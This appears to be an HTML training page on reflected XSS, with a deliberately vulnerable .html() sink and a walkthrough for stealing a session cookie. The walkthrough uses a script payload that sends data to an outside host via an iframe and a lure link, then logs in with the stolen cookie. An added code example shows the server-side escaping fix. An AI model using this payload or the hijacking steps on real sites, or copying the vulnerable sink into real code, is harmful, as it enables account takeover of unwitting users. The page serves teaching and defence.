<html>
<head>
<title>Learn From Mistakes. Reflected XSS</title>
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.min.js"></script>
<script src="/static/js/jquery.nouislider.js"></script>
<link rel="stylesheet" type="text/css" href="/static/css/common.css" />
<link rel="stylesheet" type="text/css" href="/static/css/slide.css" />
<link rel="stylesheet" type="text/css"
	href="/static/css/bootstrap.min.css" />
<link rel="stylesheet" type="text/css"
	href="/static/css/flat-ui.min.css" />
<link rel="stylesheet" type="text/css"
	href="/static/css/jquery.nouislider.css" />
</head>
<body>
	<div>
		<ol>
			<li>Enter a user name.</li>
			<li>On submit, the user name is sent to the backend, which validates the user and, if the name is invalid, throws an exception or returns a message.</li>
			<li>The text that was entered is rendered as markup and executed as script.</li>
		</ol>
	</div>
	<div>
		<form role="form">
			<div class="form-group">
				<label for="name">User name</label> <input type="text"
					class="form-control" id="name" placeholder="Enter a name" />
			</div>
			<input type="button" class="btn btn-primary" value="Submit"
				onclick="checkUserExists()" />
		</form>
	</div>
	<div class="modal fade" id="myModal" tabindex="-1" role="dialog"
		aria-labelledby="myModalLabel" aria-hidden="true">
		<div class="modal-dialog">
			<div class="modal-content">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal"
						aria-hidden="true">×</button>
					<h4 class="modal-title" id="myModalLabel">Information</h4>
				</div>
				<div class="modal-body" id="alertdlg"></div>
				<div class="modal-footer">
					<button type="button" class="btn btn-primary" data-dismiss="modal">Close</button>
				</div>
			</div>
			<!-- /.modal-content -->
		</div>
		<!-- /.modal-dialog -->
	</div>
	<div>
		<ol>
			<li>Once a site is confirmed to be vulnerable to XSS, what is that worth to an attacker? Consider that some sites let a user log in with nothing more than a session cookie.</li>
			<li>Demonstrate logging into the 睿治 platform using only a cookie.</li>
			<li>Construct a URL that sends the current site's cookie to another address.
			<ol>
			<li>(1) A site is known to have a reflected XSS vulnerability at http://localhost:9000/syr/rxss/checkparam?username=xxx (the form on this page POSTs the same parameter; the demo link passes it in the query string).</li>
			<li>(2) Craft the username parameter so that it contains a script that reads the cookie. The value must be URL-encoded when placed in the link (for example "+" becomes "%2B"), otherwise the browser reinterprets it.</li>
			<li>(3) Lure the user (in Firefox) into clicking the link http://localhost:9000/syr/rxss/checkparam?username=&lt;script&gt;document.body.appendChild(document.createElement("iframe")).src="http://www.baidu.com?cookie="%2Bnavigator.appName&lt;/script&gt; . As written, this demo payload appends navigator.appName rather than document.cookie, so it only proves that script runs in the victim's page; a real exfiltration would send document.cookie.</li>
			<li>(4) Obtain the user's cookie and use EditThisCookie to log in with it.</li>
			</ol>
			</li>
		</ol>
	</div>
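	<div>
		<p>The reflection and its fix, as an added example that is not part of the original page: the server-side code of the checkparam endpoint is not shown here, so the two response builders below are an assumed stand-in for it. The payload string is the one from step (3) above, decoded from its URL form; the attack URL builder shows the encoding that step (2) requires.</p>
```javascript
// Added example (not the page's own code). Simulates how the assumed
// /syr/rxss/checkparam endpoint reflects the username parameter, and the
// output-encoding fix. The payload is the one from the page, URL-decoded.
const payload =
  '<script>document.body.appendChild(document.createElement("iframe"))' +
  '.src="http://www.baidu.com?cookie="+navigator.appName</script>';

// Assumed vulnerable server logic: the raw parameter is concatenated into
// the HTML fragment that the page later inserts with $("#alertdlg").html().
function checkparamVulnerable(username) {
  return 'User "' + username + '" does not exist';
}

// Encode the characters that change meaning in an HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed server logic: the same fragment, but the parameter is encoded on
// output, so "<script>" arrives as inert text "&lt;script&gt;".
function checkparamFixed(username) {
  return 'User "' + escapeHtml(username) + '" does not exist';
}

// Simple check for the sink: does the fragment still contain a live
// script element? (Good enough for this payload; not a general sanitizer.)
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Build the lure link from step (3). encodeURIComponent turns "+" into
// "%2B" and "<" into "%3C", matching the encoded form on the page.
function buildAttackUrl(base, username) {
  return base + '?username=' + encodeURIComponent(username);
}

// Demo on the page's payload.
const base = 'http://localhost:9000/syr/rxss/checkparam';
console.log('lure URL:      ', buildAttackUrl(base, payload));
console.log('vulnerable:    ', checkparamVulnerable(payload));
console.log('script present:', containsScriptTag(checkparamVulnerable(payload)));
console.log('fixed:         ', checkparamFixed(payload));
console.log('script present:', containsScriptTag(checkparamFixed(payload)));
```
		<p>Encoding on the server is the primary fix. Independently, the client code on this page should insert the response with .text() rather than .html(), because jQuery's .html() not only sets innerHTML but also evaluates any &lt;script&gt; elements in the fragment, which is exactly what turns the reflected text into executing code.</p>
	</div>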
	<script>
		// Send the user name to the backend and show its response in the modal.
		function checkUserExists() {
			var username = $("#name").val();
			$.post("/syr/rxss/checkparam", {
				"username" : username
			}, function(result) {
				$('#myModal').modal('show');
				// Deliberately vulnerable sink: the backend reflects the user name
				// in its response and .html() inserts it as markup (jQuery also
				// evaluates <script> elements it finds), so the input is executed.
				$("#alertdlg").html(result);
			});
		}
	</script>
	<script>
		// Make sure the modal starts hidden when the page loads.
		$(function() {
			$('#myModal').modal('hide');
		});
	</script>
</body>
</html>